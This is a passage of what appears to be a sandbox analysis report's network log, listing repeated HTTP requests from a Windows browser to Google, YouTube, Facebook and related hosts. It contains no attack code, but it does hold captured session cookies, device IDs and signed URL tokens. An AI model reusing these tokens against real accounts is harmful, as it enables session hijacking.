gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=ASKXGp3fVzQOAIUzay_76V7qWbAaDRWGasbse-QzbkN9MwrrHFMQlRupNDDVCLZCYNaottGrIEqf HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Referer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yZ/r/I_Arz_GerDQ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3ihVQ4/y8/l/en_US/Ch_YChJCKQS.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yh/r/ysfm_2i9xtW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=ASKXGp2gStXVrlBaQMjEgnAGuNCSSHQe1IaseXO0u3ysS0pvSXZ4fQfiD0S-4xguuLCPZm_FnOKq&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-787607905%3A1705534499113821&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Referer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yF/r/PtmfxLVwAb7.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /manifest.webmanifest HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-944025339&timestamp=1705534498711 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:6D-JNTZVLmEY4TJ9M5T4q09tNaSokQ:Hm2S_1tAXq0oBBMs
Source: global traffic	HTTP traffic detected: GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/loginAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQM.AWXfYTWBBsg; _js_datr=DGSoZXKoCY8OkV9WMe-nT3iH
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /generate_204?ND_aIw HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:5-VqxJMLVh1Z_yvAADCgON_4YNkrEw:2Sz4ABSfAkPCYE7F
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/img/favicon.ico HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D; PREF=tz=Europe.Zurich
Source: global traffic	HTTP traffic detected: GET /opensearch?locale=en_US HTTP/1.1Host: www.youtube.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=777201792&timestamp=1705534500346 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:5-VqxJMLVh1Z_yvAADCgON_4YNkrEw:2Sz4ABSfAkPCYE7F
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=ODCnll3A%2Fpr7IBDaNsDR2zA%2FOssZl6xdmLkM6vzzbZ0%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-03-31T00%3A00%3A00Z&sp=r&assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; __Host-GAPS=1:5-VqxJMLVh1Z_yvAADCgON_4YNkrEw:2Sz4ABSfAkPCYE7F
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/img/favicon_32x32.png HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D; PREF=tz=Europe.Zurich
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=4270472996&ei=-uFNQh5txcmJSA7RUUvW6ti&ip=0.16.65.16&id=o-AFNUgc8ie4UDxg5BX6NylC1tYWE2UNTg0UhYW3BQWlr4o&itag=18&source=youtube&requiressl=yes&mh=X6&mm=458%2C23244%2C40999&mn=tIXQK%2CPFcB0%2CHv9lm&ms=tIXQK%2CPFcB0%2CHv9lm&mv=t&mvi=1&pl=26&ctier=L&initcwndbps=6086012&siu=1&spc=YMyTvzafjmQEXNneymJ8VxaRI9K39WIY_jBqFPfolJ0A&vprv=1&svpuc=1&mime=video%2Fmp4&ns=AdU1asG7fzzfAPcTr4VrvGXP&cnr=26&ratebypass=yes&dur=68643808&lmt=8594843229343748&mt=4270472996&fvip=3&c=WEB&txp=6086012&n=gjtr8jSjFest6pec&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=zppDUWKj_-KGjMPGAZpTOOnHKEUBYAEhYh9X27xzTHUmBCnJfiwDIsNw-ASpImB7kBmn0qqYETNnUCEbzpGh38bub8qcYyUhfxngZbKe6S_A HTTP/1.1Host: rr1---sn-q4fl6nlz.googlevideo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.youtube.comX-Client-Data: 